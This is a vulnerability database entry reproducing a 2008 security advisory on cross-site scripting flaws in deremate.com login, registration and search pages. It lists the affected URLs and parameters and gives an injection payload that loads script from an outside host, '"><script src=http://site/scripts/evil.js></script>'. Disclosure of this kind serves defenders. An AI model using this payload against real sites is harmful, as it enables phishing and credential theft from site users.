DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:69354", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "deremate-xssrfi.txt", "description": "", "published": "2008-08-24T00:00:00", "modified": "2008-08-24T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/69354/deremate-xssrfi.txt.html", "reporter": "Ivan Sanchez", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2016-11-03T10:29:36", "viewCount": 18, "enchantments": {"score": {"value": -0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.3}, "_state": {"dependencies": 1678912101, "score": 1678911848, "epss": 1678924918}, "_internal": {"score_hash": "7bc6131368816bba515e389b1b346bbf"}, "sourceHref": "https://packetstormsecurity.com/files/download/69354/deremate-xssrfi.txt", "sourceData": "`[ www.nullcode.com.ar ] \n \n+==========================================================================+ \n+ Deremate.com security compromised with XSS/ RFI flaw + \n+==========================================================================+ \n \n \nAuthor(s): Ivan Sanchez \n \nProduct:deremate.com \n \nWeb:http://www.deremate.com/ \n \nVersions,sites affected: Copyright \u00a9 1999-2006 DeRemate.com \n \n \nDate: 24/08/2008 \n \n \nOn Deremate Domain Sites Allows Phishing and others security compromised with XSS/ RFI/ flaw... \n \n \n \nGOOGLE DORKS: \n------------ \n \n\"deremate.com\" \n \n \n \nDomains affected part I: \n------------------------ \n \nhttp://afiliados.deremate.com.ar/login.asp \nhttp://afiliados.deremate.com.ar/registro/registro-particular-t1.asp \nhttp://afiliados.deremate.com.ar/registro/registro-empresa-t1.asp \n \n(there are other links vulnerables) \n \n \nParameters affected: \n-------------------- \n \ntxtIDUsuario \ntxtContrasena \n \n \nEvil code to input into parameter: \"><script src=http://site/scripts/evil.js></script> \n \n \n \nDomain affected part II: \n------------------------- \n \nhttp://www.deremate.com.ar/cafe/runSearch.asp \n \n(there are other links vulnerables) \n \n \nParameters affected: \n-------------------- \n \ntoSearch \n \nEvil code to input into parameter: \"><script src=http://site/scripts/evil.js></script> \n \n \n \nRemediation: review and then sanitized all internal code. \n------------ \n \n \n \nNULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs! \n+==========================================================================+ \n+ Deremate security compromised with XSS/ RFI flaw + \n+==========================================================================+ \n`\n"}

{}